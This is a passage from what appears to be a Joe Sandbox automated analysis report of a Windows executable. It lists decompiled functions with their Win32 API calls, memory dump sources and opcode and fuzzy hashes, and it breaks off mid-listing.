                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 00442B01
                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$Peek$DispatchTranslate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1795658109-0
                                                                                                                                                                                                                • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                                                                                                                • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                                                                                                                                                Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                                                                                                                                                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                                                                                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                                                                                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                                                                                                                • GetCaretPos.USER32(?), ref: 004743B2
                                                                                                                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 004743EE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2759813231-0
                                                                                                                                                                                                                • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                                                                                                • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                                                                                                                                Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00449519
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00449526
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend_wcslen$_wcspbrk
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2886238975-0
                                                                                                                                                                                                                • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                                                                                                                • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                                                                                                                                                Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __setmode$DebugOutputString_fprintf
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1792727568-0
                                                                                                                                                                                                                • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                                                                                                                                • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                                                                                                                                                Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2169480361-0
                                                                                                                                                                                                                • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                                                                                                                • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                                                                                                                                Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                                                                                                                                  • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                                                                                                                                  • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                                                                                                                                                • String ID: cdecl
                                                                                                                                                                                                                • API String ID: 3850814276-3896280584
                                                                                                                                                                                                                • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                                                                                                                                                • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                                                                                                                                                Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                                                                                                                • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                                                                                                                                                                • _memmove.LIBCMT ref: 0046D475
                                                                                                                                                                                                                • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2502553879-0
                                                                                                                                                                                                                • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                                                                                                                • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                                                                                                                                                                Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32 ref: 00448C69
                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 312131281-0
                                                                                                                                                                                                                • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                                                                                                                • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                                                                                                                                                Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                                                                                                                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLastacceptselect
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 385091864-0
                                                                                                                                                                                                                • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                                                                                                                • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                                                                                                                                Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                                                                                                                • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                                                                                                                                Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1358664141-0
                                                                                                                                                                                                                • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                                                                                                                • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                                                                                                                                Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
